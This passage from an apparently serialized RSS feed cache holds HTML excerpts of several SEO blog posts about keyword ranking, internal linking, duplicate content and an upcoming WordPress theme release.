ranking using SEO. Each keyword has a threshold that search engines and the competition have set, finding it and surpassing that mark is the true objective of search engine optimization. Just like climbing Mount Everest (conquering a competitive keyword), takes planning, preparation and execution. [...]\";s:12:\"atom_content\";s:2150:\"<p>Rome was not built in a day, neither was a top ranking using SEO. Each keyword has a threshold that search engines and the competition have set, finding it and surpassing that mark is the true objective of search engine optimization.<br />\n<a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/build-authority-before-links/\"><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/01/mount-everest.jpg\" alt=\"mount-everest\" title=\"mount-everest\" width=\"400\" height=\"265\" class=\"aligncenter size-full wp-image-1106\" /></a><br />\nJust like climbing <strong>Mount Everest</strong> (<strong>conquering a competitive keyword</strong>), takes planning, preparation and execution. One of the common misconceptions about search engine optimization is that once you acquire the most competitive keyword in your industry the floodgates will open and your job marketing your product or service is done.</p>\n<p>Nothing is farther from the truth, sure SEO can generate hordes of traffic, but unless the fundamental <a href=\"http://www.seodesignsolutions.com/blog/seo/impulse-surfing-click-triggers-and-keywords/\">click-triggers</a> are in place, a strong value proposition exists or if your presentation just doesn&#8217;t make the grade, there is no loyalty from would be visitors perusing your content, only the back button.</p>\n<p>The premise is simple, appear for as many relevant keywords as possible that funnel visitors to the underlying conversion objective. </p>\n<p>>>>Click Here to Read the Full Post &#8211; <a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/build-authority-before-links/\">Build Authority Before Links</a> < <<.<br />\n<span id=\"more-9274\"></span></p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=BjdrkiImg_8:bQt6OrubZgg:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/BjdrkiImg_8\" height=\"1\" width=\"1\"/>\";}i:2;a:12:{s:5:\"title\";s:45:\"20 Timeless SEO Tips to Defuse Search Animals\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/IUrvXV-SmrM/\";s:8:\"category\";s:8:\"SEO Tips\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Thu, 11 Jul 2013 12:48:55 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9267\";s:7:\"content\";a:1:{s:7:\"encoded\";s:2243:\"<p>Today’s <em>post from the past</em> covers 20 SEO techniques you either forgot or never knew about, including proven insights for producing viable, repeatable results.</p>\n<p style=\"text-align: center;\"><a href=\"http://www.seodesignsolutions.com/blog/seo-tips/20-seo-tips-you-either-forgot-or-didnt-know/\"><img class=\"aligncenter size-full wp-image-8737\" title=\"20-things-about-seo\" alt=\"20 SEO Tips\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/05/20-things-about-seo.jpg\" width=\"368\" height=\"326\" /><br />\n</a><strong>It&#8217;s ok bobo, we&#8217;ve got your back!</strong></p>\n<p>With search engine animals and algorithms being more difficult to impress, creating websites that holistically reinforce themselves both internally from <a href=\"http://www.seodesignsolutions.com/blog/seo/how-to-easily-create-silo-site-architecture/\">website silo architecture</a> and internal linking as well as receive sufficient <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/theming-your-content-for-higher-search-engine-results/\">peer review</a> via links from other topical websites (in the proper proportions with an acceptable <a href=\"http://www.seodesignsolutions.com/blog/link-building/finding-the-right-link-velocity-to-complement-seo/\">link velocity</a> ) determines the strength of the website and which keywords emerge with a dominant presence in search results.</p>\n<p>Despite this post being over 2 years old, these strategies are still effective in a post penguin and panda world. Click here to read the original post &#8211; &#8220;<a href=\"http://www.seodesignsolutions.com/blog/seo-tips/20-seo-tips-you-either-forgot-or-didnt-know/\">20 Things You Either Forgot or Never Knew About SEO</a>&#8220;.</p>\n<p><span id=\"more-9267\"></span></p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=IUrvXV-SmrM:GenmAslfyCM:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/IUrvXV-SmrM\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:396:\"Today’s post from the past covers 20 SEO techniques you either forgot or never knew about, including proven insights for producing viable, repeatable results. It&#8217;s ok bobo, we&#8217;ve got your back! With search engine animals and algorithms being more difficult to impress, creating websites that holistically reinforce themselves both internally from website silo architecture and [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"0\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:91:\"http://www.seodesignsolutions.com/blog/seo-tips/20-timeless-seo-tips-defuse-search-animals/\";}s:7:\"summary\";s:396:\"Today’s post from the past covers 20 SEO techniques you either forgot or never knew about, including proven insights for producing viable, repeatable results. It&#8217;s ok bobo, we&#8217;ve got your back! With search engine animals and algorithms being more difficult to impress, creating websites that holistically reinforce themselves both internally from website silo architecture and [...]\";s:12:\"atom_content\";s:2243:\"<p>Today’s <em>post from the past</em> covers 20 SEO techniques you either forgot or never knew about, including proven insights for producing viable, repeatable results.</p>\n<p style=\"text-align: center;\"><a href=\"http://www.seodesignsolutions.com/blog/seo-tips/20-seo-tips-you-either-forgot-or-didnt-know/\"><img class=\"aligncenter size-full wp-image-8737\" title=\"20-things-about-seo\" alt=\"20 SEO Tips\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/05/20-things-about-seo.jpg\" width=\"368\" height=\"326\" /><br />\n</a><strong>It&#8217;s ok bobo, we&#8217;ve got your back!</strong></p>\n<p>With search engine animals and algorithms being more difficult to impress, creating websites that holistically reinforce themselves both internally from <a href=\"http://www.seodesignsolutions.com/blog/seo/how-to-easily-create-silo-site-architecture/\">website silo architecture</a> and internal linking as well as receive sufficient <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/theming-your-content-for-higher-search-engine-results/\">peer review</a> via links from other topical websites (in the proper proportions with an acceptable <a href=\"http://www.seodesignsolutions.com/blog/link-building/finding-the-right-link-velocity-to-complement-seo/\">link velocity</a> ) determines the strength of the website and which keywords emerge with a dominant presence in search results.</p>\n<p>Despite this post being over 2 years old, these strategies are still effective in a post penguin and panda world. Click here to read the original post &#8211; &#8220;<a href=\"http://www.seodesignsolutions.com/blog/seo-tips/20-seo-tips-you-either-forgot-or-didnt-know/\">20 Things You Either Forgot or Never Knew About SEO</a>&#8220;.</p>\n<p><span id=\"more-9267\"></span></p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=IUrvXV-SmrM:GenmAslfyCM:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/IUrvXV-SmrM\" height=\"1\" width=\"1\"/>\";}i:3;a:12:{s:5:\"title\";s:40:\"SEO Tools: Looking Back to Move Forward!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/ygIVQfNT5A8/\";s:8:\"category\";s:20:\"SEO ToolsSEOSEO Tips\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Mon, 11 Mar 2013 04:06:54 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9243\";s:7:\"content\";a:1:{s:7:\"encoded\";s:7115:\"<p>Sometimes, especially with SEO tools, you&#8217;ve got to go back to move forward. I recently stumbled accross this old video of myself and my good friend Matt Da Cruz from 3 years ago discussing the future of some of the sickest SEO tools ever released for public consumption.<br />\n<object width=\"500\" height=\"281\" classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/oip4_46eoNA?hl=en_US&amp;version=3\" /><param name=\"allowfullscreen\" value=\"true\" /><embed width=\"500\" height=\"281\" type=\"application/x-shockwave-flash\" src=\"http://www.youtube.com/v/oip4_46eoNA?hl=en_US&amp;version=3\" allowFullScreen=\"true\" allowscriptaccess=\"always\" allowfullscreen=\"true\" /></object><br />\nThis was the precursor to some of the features we had planned for the <a href=\"http://www.wpultimatetheme.com/wp-ultimate-features/\">WP Ultimate Theme</a> and features that they were building into their suite of tools for  <a href=\"http://www.networkempire.com/dap/a/?a=152\">Domain Web Studio</a>.</p>\n<p>When reminiscing back to 2011, I get excited for two reasons (1) I still had my dreadlocks which I later cut in 2012 (big mistake after 21 years of committment) and (2) the sinister advanced SEO brain storm sessions with Matt plotting market-domination over some highly-caffeinated coffee hit truly unchartered depths.</p>\n<p>For the record, we could spend the next 10 years building out <strong>the tip of the iceberg</strong> for some of the automated tools we discussed, but I digress.</p>\n<p>Looking back in hindsight reminds me that it&#8217;s a good idea to evaluate and assess your old strategies, progress and lessons learned along the way (essentially knowing where you have been, to define where you&#8217;re going).</p>\n<p>While many of the proposed modules we discussed on the video then have changed (such is life), other ideas have evolved and taken their place in existing features in either their software or ours.</p>\n<p>Speaking of modules, we have some great updates underway for SEO Ultimate&#8217;s Opengraph Integrator module and are looking forward to updating other SEO Ultimate features for the sake of enhanced usability&#8230; But what about our WP Ultimate theme?</p>\n<h3>Update on The WP Ultimate Theme Release</h3>\n<p>In all truthfulness, you&#8217;ll never have a <em>second chance to make a first impression,</em> which is why we&#8217;ve been so stringent about not releasing our beta version of WP Ultimate Theme until each feature is checked, double checked and triple checked under a diverse array of use-case scenarios.</p>\n<p>To whet your beak in anticipation of the release, we&#8217;ve provided a few sneak-peak screen caps below for you to peruse.</p>\n<p><img class=\"aligncenter size-full wp-image-9244\" alt=\"WP Ultimate SEO Design Theme\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/03/WPU-Cap.jpg\" width=\"500\" height=\"340\" /></p>\n<p style=\"text-align: center;\"><strong>The Layout settings</strong> feature allows <strong>fixed, fluid or responsive layout</strong> options and customizable sidebar and/or content width.</p>\n<p><img class=\"aligncenter size-full wp-image-9245\" alt=\"WPU Screen Cap\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/03/WPU-Cap2.jpg\" width=\"500\" height=\"357\" /></p>\n<p style=\"text-align: center;\"><strong>The Typography and Style Settings</strong> allow granularly CSS / Design control w/ color picker and straight-forward controls.</p>\n<p style=\"text-align: center;\"><img class=\"aligncenter size-full wp-image-9246\" alt=\"WPU Screen Cap 3\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/03/WPU-Cap3.jpg\" width=\"500\" height=\"324\" /></p>\n<p style=\"text-align: center;\"><strong>The Ad Manager Module</strong> allows you to add HTML scripts or upload banners with ease and ads can also be used as short codes.</p>\n<p style=\"text-align: center;\"><img class=\"aligncenter size-full wp-image-9247\" alt=\"WPU Screen Cap 4\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/03/WPU-Cap4.jpg\" width=\"506\" height=\"312\" /></p>\n<p style=\"text-align: center;\"><strong>The Short Code Generator Module</strong> allows you to create and use your own short codes (maps, contact forms, HTML or text) or, you can select from our built-in short codes from content boxes to columns (it&#8217;s in there).</p>\n<p>In closing, affiliates and small business owners seeking a visually stunning SEO equalizer will soon have some new <strong>SEO and Design</strong> tools to play with.</p>\n<p>However, in the meantime, we are currently stress-testing and refining the last batch of newly integrated features in the front-end (e.g. Twitter Bootstrap, Google Fonts, Slider Revolution, a Timed Lightbox Feature, Content Columns, <a href=\"http://fortawesome.github.com/Font-Awesome/\">Font Awesome</a>, the quick silo builder and an ever-increasing library of shortcodes).</p>\n<h3>Once Beta Testers are Done, It&#8217;s a Wrap</h3>\n<p>Our beta testers are now in their final review, so, once all bugs are crushed, we&#8217;ll broadcast the announcement to those of you reading this blog via the proper social channels and you&#8217;ll be able to download your copy and <strong>put it to the test</strong>. As always, we look forward to your feedback and suggestions on how we can make our tools the best they can be.</p>\n<p>The jury on price point is still hung as we have poured our heart, soul and most coveted tactics and tools into this framework, but we&#8217;ll be sure to entice early adopters with a special promotion coupon code for the launch before settling at the final single user license fee and extended / unlimited site user license rates.</p>\n<p>In the meantime, thank you for your patience during the scope-creep cycles we&#8217;re emerging from. We truly look forward to building a dynamic community and providing useful resources that you can deploy powered by our battle-tested SEO strategies and tools to generate more revenue for your business.</p>\n<p>If you haven&#8217;t already, feel free to download <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a> our All-In-One WordPress SEO Plugin and take a peak at the <a href=\"http://www.seodesignsolutions.com/wordpress-seo/\">video tutorial</a> explaining how to use its various features. Thanks again and stay tuned for more SEO goodies.</p>\n<p>Have questions or have something to say? Speak up! Share your thoughts below.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=ygIVQfNT5A8:1j0aW7_KlwA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/ygIVQfNT5A8\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:322:\"Sometimes, especially with SEO tools, you&#8217;ve got to go back to move forward. I recently stumbled accross this old video of myself and my good friend Matt Da Cruz from 3 years ago discussing the future of some of the sickest SEO tools ever released for public consumption. This was the precursor to some of the [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"3\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:88:\"http://www.seodesignsolutions.com/blog/seo-tools/seo-tools-looking-back-to-move-forward/\";}s:7:\"summary\";s:322:\"Sometimes, especially with SEO tools, you&#8217;ve got to go back to move forward. I recently stumbled accross this old video of myself and my good friend Matt Da Cruz from 3 years ago discussing the future of some of the sickest SEO tools ever released for public consumption. This was the precursor to some of the [...]\";s:12:\"atom_content\";s:7115:\"<p>Sometimes, especially with SEO tools, you&#8217;ve got to go back to move forward. I recently stumbled accross this old video of myself and my good friend Matt Da Cruz from 3 years ago discussing the future of some of the sickest SEO tools ever released for public consumption.<br />\n<object width=\"500\" height=\"281\" classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/oip4_46eoNA?hl=en_US&amp;version=3\" /><param name=\"allowfullscreen\" value=\"true\" /><embed width=\"500\" height=\"281\" type=\"application/x-shockwave-flash\" src=\"http://www.youtube.com/v/oip4_46eoNA?hl=en_US&amp;version=3\" allowFullScreen=\"true\" allowscriptaccess=\"always\" allowfullscreen=\"true\" /></object><br />\nThis was the precursor to some of the features we had planned for the <a href=\"http://www.wpultimatetheme.com/wp-ultimate-features/\">WP Ultimate Theme</a> and features that they were building into their suite of tools for  <a href=\"http://www.networkempire.com/dap/a/?a=152\">Domain Web Studio</a>.</p>\n<p>When reminiscing back to 2011, I get excited for two reasons (1) I still had my dreadlocks which I later cut in 2012 (big mistake after 21 years of committment) and (2) the sinister advanced SEO brain storm sessions with Matt plotting market-domination over some highly-caffeinated coffee hit truly unchartered depths.</p>\n<p>For the record, we could spend the next 10 years building out <strong>the tip of the iceberg</strong> for some of the automated tools we discussed, but I digress.</p>\n<p>Looking back in hindsight reminds me that it&#8217;s a good idea to evaluate and assess your old strategies, progress and lessons learned along the way (essentially knowing where you have been, to define where you&#8217;re going).</p>\n<p>While many of the proposed modules we discussed on the video then have changed (such is life), other ideas have evolved and taken their place in existing features in either their software or ours.</p>\n<p>Speaking of modules, we have some great updates underway for SEO Ultimate&#8217;s Opengraph Integrator module and are looking forward to updating other SEO Ultimate features for the sake of enhanced usability&#8230; But what about our WP Ultimate theme?</p>\n<h3>Update on The WP Ultimate Theme Release</h3>\n<p>In all truthfulness, you&#8217;ll never have a <em>second chance to make a first impression,</em> which is why we&#8217;ve been so stringent about not releasing our beta version of WP Ultimate Theme until each feature is checked, double checked and triple checked under a diverse array of use-case scenarios.</p>\n<p>To whet your beak in anticipation of the release, we&#8217;ve provided a few sneak-peak screen caps below for you to peruse.</p>\n<p><img class=\"aligncenter size-full wp-image-9244\" alt=\"WP Ultimate SEO Design Theme\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/03/WPU-Cap.jpg\" width=\"500\" height=\"340\" /></p>\n<p style=\"text-align: center;\"><strong>The Layout settings</strong> feature allows <strong>fixed, fluid or responsive layout</strong> options and customizable sidebar and/or content width.</p>\n<p><img class=\"aligncenter size-full wp-image-9245\" alt=\"WPU Screen Cap\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/03/WPU-Cap2.jpg\" width=\"500\" height=\"357\" /></p>\n<p style=\"text-align: center;\"><strong>The Typography and Style Settings</strong> allow granularly CSS / Design control w/ color picker and straight-forward controls.</p>\n<p style=\"text-align: center;\"><img class=\"aligncenter size-full wp-image-9246\" alt=\"WPU Screen Cap 3\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/03/WPU-Cap3.jpg\" width=\"500\" height=\"324\" /></p>\n<p style=\"text-align: center;\"><strong>The Ad Manager Module</strong> allows you to add HTML scripts or upload banners with ease and ads can also be used as short codes.</p>\n<p style=\"text-align: center;\"><img class=\"aligncenter size-full wp-image-9247\" alt=\"WPU Screen Cap 4\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/03/WPU-Cap4.jpg\" width=\"506\" height=\"312\" /></p>\n<p style=\"text-align: center;\"><strong>The Short Code Generator Module</strong> allows you to create and use your own short codes (maps, contact forms, HTML or text) or, you can select from our built-in short codes from content boxes to columns (it&#8217;s in there).</p>\n<p>In closing, affiliates and small business owners seeking a visually stunning SEO equalizer will soon have some new <strong>SEO and Design</strong> tools to play with.</p>\n<p>However, in the meantime, we are currently stress-testing and refining the last batch of newly integrated features in the front-end (e.g. Twitter Bootstrap, Google Fonts, Slider Revolution, a Timed Lightbox Feature, Content Columns, <a href=\"http://fortawesome.github.com/Font-Awesome/\">Font Awesome</a>, the quick silo builder and an ever-increasing library of shortcodes).</p>\n<h3>Once Beta Testers are Done, It&#8217;s a Wrap</h3>\n<p>Our beta testers are now in their final review, so, once all bugs are crushed, we&#8217;ll broadcast the announcement to those of you reading this blog via the proper social channels and you&#8217;ll be able to download your copy and <strong>put it to the test</strong>. As always, we look forward to your feedback and suggestions on how we can make our tools the best they can be.</p>\n<p>The jury on price point is still hung as we have poured our heart, soul and most coveted tactics and tools into this framework, but we&#8217;ll be sure to entice early adopters with a special promotion coupon code for the launch before settling at the final single user license fee and extended / unlimited site user license rates.</p>\n<p>In the meantime, thank you for your patience during the scope-creep cycles we&#8217;re emerging from. We truly look forward to building a dynamic community and providing useful resources that you can deploy powered by our battle-tested SEO strategies and tools to generate more revenue for your business.</p>\n<p>If you haven&#8217;t already, feel free to download <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a> our All-In-One WordPress SEO Plugin and take a peak at the <a href=\"http://www.seodesignsolutions.com/wordpress-seo/\">video tutorial</a> explaining how to use its various features. Thanks again and stay tuned for more SEO goodies.</p>\n<p>Have questions or have something to say? Speak up! Share your thoughts below.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=ygIVQfNT5A8:1j0aW7_KlwA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/ygIVQfNT5A8\" height=\"1\" width=\"1\"/>\";}i:4;a:12:{s:5:\"title\";s:49:\"Are Internal Links More Important than Backlinks?\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/1i5w_UIJblA/\";s:8:\"category\";s:72:\"SEO BasicsInternal Linking for SEOinternal-linksseo and internal linking\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Mon, 04 Mar 2013 23:41:01 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9241\";s:7:\"content\";a:1:{s:7:\"encoded\";s:2649:\"<p>Do <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-and-internal-linking/\">internal links</a> pass more referential integrity for the topic of your pages and where they fit in to your website&#8217;s architecture to search engines than <strong>links from other websites</strong>? Let&#8217;s investigate in today&#8217;s post.</p>\n<div class=\"wp-caption aligncenter\" style=\"width: 356px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-resources/why-internal-links-are-more-important-than-backlinks/\"><img alt=\"SEO and Internal Linking\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/02/seo-circulatory-system.jpg\" width=\"346\" height=\"346\" /></a><p class=\"wp-caption-text\">Why Internal Links Matter More than Backlinks</p></div>\n<p>To start with a mental image and analogy, think of internal links like veins in your website analogous <a title=\"SEO\" href=\"http://www.seodesignsolutions.com/seo/\">SEO</a> circulatory system.  Their role and function are equally as important to the health of your website as the veins are to your body.</p>\n<h3>The Value of Link Weight</h3>\n<p>Think of each page as an island in itself, the page essentially has 3 attributes and/or characteristics (1) the links to it <strong>from other pages</strong> (2) the <strong>content or topic</strong> of the page and (3) the <strong>links leaving</strong> the page.</p>\n<p>Based on those three characteristics each page serves a very specific function in the website. That function is either  (1) to rank as a <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-tips-to-create-a-champion-page/\">champion page</a>  / <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-techniques/\">preferred landing page</a> or (2) to serve as a <a href=\"http://www.seodesignsolutions.com/blog/seo/how-to-easily-create-silo-site-architecture/\">hub page</a> / supporting page (to create enough topical relevance) to rank preferred landing pages.</p>\n<p style=\"text-align: center;\">Continue reading &gt;&gt;&gt; <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/why-internal-links-are-more-important-than-backlinks/\">Why Internal Links are More Important than Backlinks</a> Here!</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=1i5w_UIJblA:Lz9WT3ozZqo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/1i5w_UIJblA\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:358:\"Do internal links pass more referential integrity for the topic of your pages and where they fit in to your website&#8217;s architecture to search engines than links from other websites? Let&#8217;s investigate in today&#8217;s post. To start with a mental image and analogy, think of internal links like veins in your website analogous SEO circulatory [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"7\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:99:\"http://www.seodesignsolutions.com/blog/seo-basics/are-internal-links-more-important-than-backlinks/\";}s:7:\"summary\";s:358:\"Do internal links pass more referential integrity for the topic of your pages and where they fit in to your website&#8217;s architecture to search engines than links from other websites? Let&#8217;s investigate in today&#8217;s post. To start with a mental image and analogy, think of internal links like veins in your website analogous SEO circulatory [...]\";s:12:\"atom_content\";s:2649:\"<p>Do <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-and-internal-linking/\">internal links</a> pass more referential integrity for the topic of your pages and where they fit in to your website&#8217;s architecture to search engines than <strong>links from other websites</strong>? Let&#8217;s investigate in today&#8217;s post.</p>\n<div class=\"wp-caption aligncenter\" style=\"width: 356px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-resources/why-internal-links-are-more-important-than-backlinks/\"><img alt=\"SEO and Internal Linking\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/02/seo-circulatory-system.jpg\" width=\"346\" height=\"346\" /></a><p class=\"wp-caption-text\">Why Internal Links Matter More than Backlinks</p></div>\n<p>To start with a mental image and analogy, think of internal links like veins in your website analogous <a title=\"SEO\" href=\"http://www.seodesignsolutions.com/seo/\">SEO</a> circulatory system.  Their role and function are equally as important to the health of your website as the veins are to your body.</p>\n<h3>The Value of Link Weight</h3>\n<p>Think of each page as an island in itself, the page essentially has 3 attributes and/or characteristics (1) the links to it <strong>from other pages</strong> (2) the <strong>content or topic</strong> of the page and (3) the <strong>links leaving</strong> the page.</p>\n<p>Based on those three characteristics each page serves a very specific function in the website. That function is either  (1) to rank as a <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-tips-to-create-a-champion-page/\">champion page</a>  / <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-techniques/\">preferred landing page</a> or (2) to serve as a <a href=\"http://www.seodesignsolutions.com/blog/seo/how-to-easily-create-silo-site-architecture/\">hub page</a> / supporting page (to create enough topical relevance) to rank preferred landing pages.</p>\n<p style=\"text-align: center;\">Continue reading &gt;&gt;&gt; <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/why-internal-links-are-more-important-than-backlinks/\">Why Internal Links are More Important than Backlinks</a> Here!</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=1i5w_UIJblA:Lz9WT3ozZqo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/1i5w_UIJblA\" height=\"1\" width=\"1\"/>\";}i:5;a:12:{s:5:\"title\";s:50:\"Duplicate Content, What is it and How to Avoid it!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/6Extr3JuGnY/\";s:8:\"category\";s:84:\"SEO ResourcesDuplicate Content and SEOSEOShingle Analysis to Avoid Duplicate Content\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Sat, 23 Feb 2013 09:12:48 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9238\";s:7:\"content\";a:1:{s:7:\"encoded\";s:2822:\"<p>You&#8217;ve heard of duplicate content, but how do you know <strong>if you are creating it</strong> or <strong>how to stop it</strong> from penalizing your website? If you have a WordPress site, then <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/wordpress-seo-tips-to-avoid-search-engine-penalties/\">it&#8217;s a simple fix</a>, but for the sake of elaboration, let&#8217;s delve deeper into <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-natural-language-discrimination-through-semantic-analysis/\">how search engines work </a>and reveal what duplicate content really is.</p>\n<p><a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\"><img class=\"aligncenter\" alt=\"\" src=\"http://www.seodesignsolutions.com/images/uniqueness.jpg\" width=\"425\" height=\"282\" /></a></p>\n<p>Block segment analysis dictates the value of weight / ranking  factors a web page is given for a set portion of the page. For example, text in the header and footer of a document are treated differently than the text in the body section of a page.</p>\n<p>The header is given more weight than the footer and typically the body text is given more value than both (since that is where the page has the ability to distinguish itself from borrowed elements, i.e. navigation, etc.).</p>\n<p>The reason for this is simple, page composition dictates that proximity and distinction (the more unique one document is from another) by distinguishing your content, the better. Search engines can easily discern duplication (through <a href=\"http://www.seodesignsolutions.com/blog/web-resources/semantic-optimization-keywords-and-co-occurrence-revisited/\">shingle analysis</a>, singular value decomposition (<a href=\"http://en.wikipedia.org/wiki/Singular_value_decomposition\">SVD</a>), etc.) in areas such as <a href=\"http://www.seodesignsolutions.com/blog/seo-videos/google-website-analysis-live-site-review/\">navigation, sidebars</a>/blogrolls with the same links and footers all using the same text. This has the tendency of diffuse a pages ranking potential.</p>\n<p>Click Here to Read the Complete Post &#8211; &#8220;<a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\">Block Segmentation, Duplicate Content, SEO and IR</a>&#8221; or simply click the image above. As always, comments are welcomed and encouraged!</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a 